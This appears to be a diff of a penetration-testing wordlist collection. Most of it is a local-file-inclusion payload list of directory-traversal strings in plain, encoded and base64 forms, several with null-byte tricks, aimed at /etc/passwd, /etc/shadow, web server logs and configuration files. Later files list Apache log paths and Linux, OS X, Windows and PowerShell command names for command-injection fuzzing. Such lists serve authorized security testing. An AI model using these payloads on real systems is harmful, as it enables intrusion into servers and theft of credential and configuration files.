../../../../../../../usr/local/apache/logs/access. log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/local/Zend/etc/php.ini
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/log/xferlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/access_log
/var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../var/log/access_log
/var/log/acct
/var/log/apache2/access_log
/var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/authlog
/var/log/auth.log
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
/var/log/error_log
/var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../var/log/error_log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/
/var/log/httpd/access_log
/var/log/httpd/access.log
../../../../../var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/error.log
../../../../../var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysqld.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/POPlog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/../../var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/web/conf/php.ini
/WINDOWS\php.ini
../../windows/win.ini
/WINNT\php.ini
/..\..\..\..\..\..\winnt\win.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
/.Xauthority
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==

6
attack/lfi/common-ms-httpd-log-locations.txt Normal file
View file

@ -0,0 +1,6 @@
\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files (x86)\Apache Group\Apache\logs\access.log
\Program Files (x86)\Apache Group\Apache\logs\error.log

30
attack/lfi/common-unix-httpd-log-locations.txt Normal file
View file

@ -0,0 +1,30 @@
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
/apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log

571
attack/os-cmd-execution/Commands-Linux.txt Normal file
View file

@ -0,0 +1,571 @@
accept
access
aclocal
aconnect
acpi
acpi_available
acpid
addr2line
addresses
agetty
alsactl
amidi
amixer
anacron
aplay
aplaymidi
apm
apmd
apropos
apt
ar
arch
arecord
arecordmidi
arp
as
at
atd
atq
atrm
audiosend
aumix
autoconf
autoheader
automake
autoreconf
autoscan
autoupdate
badblocks
banner
basename
bash
batch
bc
biff
bison
bzcmp
bzdiff
bzgrep
bzip2
bzless
bzmore
c++
cal
cardctl
cardmgr
cat
cc
cdda2wav
cdparanoia
cdrdao
cdrecord
cfdisk
c++filt
chage
chattr
chfn
chgrp
chkconfig
chmod
chown
chpasswd
chroot
chrt
chsh
chvt
cksum
clear
cmp
col
colcrt
colrm
column
comm
compress
cp
cpio
cpp
crond
crontab
csplit
ctags
cupsd
cut
cvs
date
dd
deallocvt
debugfs
depmod
devdump
df
diff
diff3
dig
dir
dircolors
dirname
disable
dlpsh
dmesg
dnsdomainname
dnssec-keygen
dnssec-makekeyset
dnssec-signkey
dnssec-signzone
doexec
domainname
dosfsck
du
dump
dumpe2fs
dumpkeys
e2fsck
e2image
e2label
echo
edquota
egrep
eject
elvtune
emacs
enable
env
envsubst
esd
esdcat
esd-config
esdctl
esddsp
esdmon
esdplay
esdrec
esdsample
etags
ex
expand
expr
factor
false
fc-cache
fc-list
fdformat
fdisk
fetchmail
fgconsole
fgrep
file
find
finger
fingerd
flex
fmt
fold
formail
free
fsck
ftp
ftpd
fuser
g++
gawk
gcc
gdb
getent
getkeycodes
gpasswd
gpg
gpgsplit
gpgv
gpm
gprof
grep
groff
groffer
groupadd
groupdel
groupmod
groups
grpck
grpconv
gs
gunzip
gzexe
gzip
halt
hdparm
head
hexdump
host
hostid
hostname
htdigest
hwclock
iconv
id
ifconfig
imapd
inetd
info
init
insmod
install
ipcrm
ipcs
iptables
iptables-restore
iptables-save
isodump
isoinfo
isosize
isovfy
ispell
join
kbd_mode
kbdrate
kernelversion
kill
killall
killall5
klogd
kudzu
last
lastb
lastlog
ld
ldconfig
ldd
less
lesskey
lftp
lftpget
link
ln
loadkeys
locale
locate
lockfile
logger
login
logname
logrotate
look
losetup
lpadmin
lpinfo
lpmove
lpq
lpr
lprm
lpstat
ls
lsattr
lsmod
lspci
lsusb
m4
mail
mailq
mailstats
mailto
make
makedbm
makemap
man
manpath
mattrib
mbadblocks
mcat
mcd
mcopy
md5sum
mdel, mdeltree
mdir
mdu
merge
mesg
metamail
metasend
mformat
mimencode
minfo
mkdir
mkdosfs
mke2fs
mkfifo
mkfs
mkfs.ext3
mkisofs
mklost+found
mkmanifest
mknod
mkraid
mkswap
mktemp
mlabel
mmd
mmount
mmove
modinfo
modprobe
more
mount
mountd
mpartition
mpg123
mpg321
mrd
mren
mshowfat
mt
mtools
mtoolstest
mtype
mv
mzip
named
namei
nameif
netstat
newaliases
newgrp
newusers
nfsd
nfsstat
nice
nm
nohup
nslookup
nsupdate
objcopy
objdump
od
openvt
passwd
paste
patch
pathchk
perl
pidof
ping
pinky
pmap
portmap
poweroff
pppd
pr
praliases
printenv
printf
ps
ptx
pwck
pwconv
pwd
python
quota
quotacheck
quotaoff
quotaon
quotastats
raidstart
ramsize
ranlib
rarpd
rcp
rdate
rdev
rdist
rdistd
readcd
readelf
readlink
reboot
reject
rename
renice
repquota
reset
resize2fs
restore
rev
rexec
rexecd
richtext
rlogin
rlogind
rm
rmail
rmdir
rmmod
rndc
rootflags
route
routed
rpcgen
rpcinfo
rpm
rsh
rshd
rsync
runlevel
rup
ruptime
rusers
rusersd
rwall
rwho
rwhod
sane-find-scanner
scanadf
scanimage
scp
screen
script
sdiff
sed
sendmail
sensors
seq
setfdprm
setkeycodes
setleds
setmetamode
setquota
setsid
setterm
sftp
sh
sha1sum
showkey
showmount
shred
shutdown
size
skill
slabtop
slattach
sleep
slocate
snice
sort
split
ssh
ssh-add
ssh-agent
sshd
ssh-keygen
ssh-keyscan
stat
statd
strace
strfile
strings
strip
stty
su
sudo
sum
swapoff
swapon
sync
sysctl
sysklogd
syslogd
tac
tail
tailf
talk
talkd
tar
taskset
tcpd
tcpdump
tcpslice
tee
telinit
telnet
telnetd
test
tftp
tftpd
time
tload
tmpwatch
top
touch
tr
tracepath
traceroute
troff
true
tset
tsort
tty
tune2fs
tunelp
ul
umount
uname
uncompress
unexpand
unicode_start
unicode_stop
uniq
uptime
useradd
userdel
usermod
users
usleep
uudecode
uuencode
uuidgen
vdir
vi
vidmode
vim
vmstat
volname
w
wall
warnquota
watch
wc
wget
whatis
whereis
which
who
whoami
whois
write
xargs
xinetd
yacc
yes
ypbind
ypcat
ypinit
ypmatch
yppasswd
yppasswdd
yppoll
yppush
ypserv
ypset
yptest
ypwhich
ypxfr
zcat
zcmp
zdiff
zdump
zforce
zgrep
zic
zless
zmore
znew

233
attack/os-cmd-execution/Commands-OSX.txt Normal file
View file

@ -0,0 +1,233 @@
alias
alloc
apropos
awk
basename
bash
bg
bind
bless
break
builtin
bzip
cal
caller
case
cat
cd
chflags
chgrp
chmod
chown
chroot
cksum
clear
cmp
comm
command
complete
continue
cp
cron
crontab
curl
cut
date
dc
dd
declare
defaults
df
diff
diff3
dig
dirname
dirs
diskutil
disown
ditto
dot_clean
drutil
dscacheutil
dscl
du
echo
ed
enable
env
eval
exec
exit
expand
expect
export
expr
false
fc
fdisk
fg
file
find
fmt
fold
for
fsck
fsaclctl
fs_usage
ftp
GetFileInfo
getopt
getopts
goto
grep
groups
gzip
hash
head
hdiutil
history
hostname
id
if
info
install
jobs
join
kextfind
kickstart
kill
l
last
launchctl
ll
less
let
lipo
ln
local
locate
logname
login
logout
lpr
lprm
lpstat
ls
lsregister
lsbom
lsof
man
mdfind
mdutil
mkdir
mkfifo
more
mount
mv
net
netstat
networksetup
nice
nohup
ntfs.util
onintr
open
opensnoop
osacompile
osascript
passwd
paste
pbcopy
pbpaste
pico
ping
pkgutil
plutil
pmset
popd
pr
printenv
printf
ps
pushd
pwd
quota
rcp
read
readonly
reboot
return
rev
rm
rmdir
rpm
rsync
say
screen
screencapture
sdiff
security
sed
select
set
setfile
shift
shopt
shutdown
sips
sleep
softwareupdate
sort
source
split
stop
su
sudo
sum
suspend
sw_vers
system_profiler
systemsetup
tail
tar
tee
test
textutil
time
times
top
touch
tr
trap
traceroute
true
tty
type
ufs.util
ulimit
umask
umount
unalias
uname
unexpand
uniq
units
unset
until
users
uuencode
uudecode
uuidgen
uucp
vi
wait
wc
whatis
where
which
while
who
whoami
write
xargs
yes

158
attack/os-cmd-execution/Commands-Windows.txt Normal file
View file

@ -0,0 +1,158 @@
a
arp
assoc
at
atmadm
attrib
bootcfg
break
cacls
call
change
chcp
chdir
chkdsk
chkntfs
cipher
cls
cmd
cmstp
color
comp
compact
convert
copy
cprofile
cscript
date
defrag
del
dir
diskcomp
diskcopy
diskpart
doskey
driverquery
echo
endlocal
eventcreate
eventquery
eventtriggers
evntcmd
exit
expand
fc
filter
find
findstr
finger
flattemp
for
format
fsutil
ftp
ftype
getmac
goto
gpresult
gpupdate
graftabl
help
helpctr
hostname
if
ipconfig
ipseccmd
ipxroute
irftp
label
lodctr
logman
lpq
lpr
macfile
mkdir
mmc
mode
more
mountvol
move
msiexec
msinfo32
nbtstat
net
netsh
netstat
nslookup
ntbackup
ntcmdprompt
ntsd
openfiles
pagefileconfig
path
pathping
pause
pbadmin
pentnt
perfmon
ping
popd
print
prncnfg
prndrvr
prnjobs
prnmngr
prnport
prnqctl
prompt
pushd
query
rasdial
rcp
recover
reg
regsvr32
relog
rem
rename
replace
rexec
rmdir
route
rsh
rsm
runas
sc
schtasks
secedit
set
setlocal
shift
shutdown
sort
start
subst
systeminfo
sfc
taskkill
tasklist
tcmsetup
telnet
tftp
time
title
tracerpt
tracert
tree
type
typeperf
unlodctr
ver
verify
vol
vssadmin
w32tm
winnt
winnt32
wmic
xcopy

164
attack/os-cmd-execution/Commands-WindowsPowershell.txt Normal file
View file

@ -0,0 +1,164 @@
get-acl
set-acl
get-alias
import-alias
new-alias
set-alias
get-authenticodesignature
set-authenticodesignature
set-location
get-childitem
get-command
measure-command
trace-command
add-content
get-content
set-content
clear-content
convertto-html
convertfrom-securestring
convertto-securestring
clear-host
clear-item
copy-item
get-credential
get-childitem
get-date
set-date
remove-item
do
get-psdrive
new-psdrive
remove-psdrive
get-eventlog
get-executionpolicy
set-executionpolicy
export-alias
export-clixml
export-console
export-csv
invoke-expression
exit
foreach-object
foreach
for
format-custom
format-list
format-table
format-wide
get-item
get-childitem
get-help
add-history
get-history
invoke-history
get-host
clear-host
read-host
write-host
if
import-clixml
import-csv
get-item
invoke-item
new-item
remove-item
set-item
clear-itemproperty
copy-itemproperty
get-itemproperty
move-itemproperty
new-itemproperty
remove-itemproperty
rename-itemproperty
set-itemproperty
stop-process
get-location
pop-location
push-location
set-location
add-member
get-member
move-item
compare-object
group-object
measure-object
new-object
select-object
sort-object
where-object
out-default
out-file
out-host
out-null
out-printer
out-string
powershell
convert-path
join-path
resolve-path
split-path
test-path
get-pfxcertificate
pop-location
push-location
get-process
stop-process
clear-itemproperty
copy-itemproperty
get-itemproperty
move-itemproperty
new-itemproperty
